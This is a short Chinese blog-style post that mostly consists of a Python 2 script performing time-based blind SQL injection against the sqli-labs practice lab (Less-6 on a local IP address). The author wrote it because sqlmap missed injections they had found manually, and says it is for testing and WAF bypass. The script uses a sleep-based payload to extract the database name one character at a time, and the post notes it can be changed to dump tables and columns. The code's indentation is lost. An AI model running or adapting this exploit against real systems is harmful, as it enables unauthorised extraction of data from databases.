学而不思则罔,死而不学则殆
在几次测试中,自己手工找出来的sql注入漏洞 sqlmap竟然没跑出来,这就很尴尬了,所以就自己练习也个盲注脚本,以后测试或者在绕过waf的时候都能用到。
import time
import requests
payloads = "abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_."
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"}
database = ""
url = "https://192.168.1.102/sqli-labs/Less-6/?id=1"
exp = '" and if(ascii(substr(database(),{0},1))={1},sleep(3),1) %23 '
for num in range(1,10):
for i in payloads:
url_ = url+exp.format(num,ord(i))
start_time = time.time()
r = requests.get(url_,headers=headers)
if time.time()-start_time > 2.5 :
database = database+i
print database
else:
pass
测试效果:
在跑表和字段的时候就需要自己修改exp了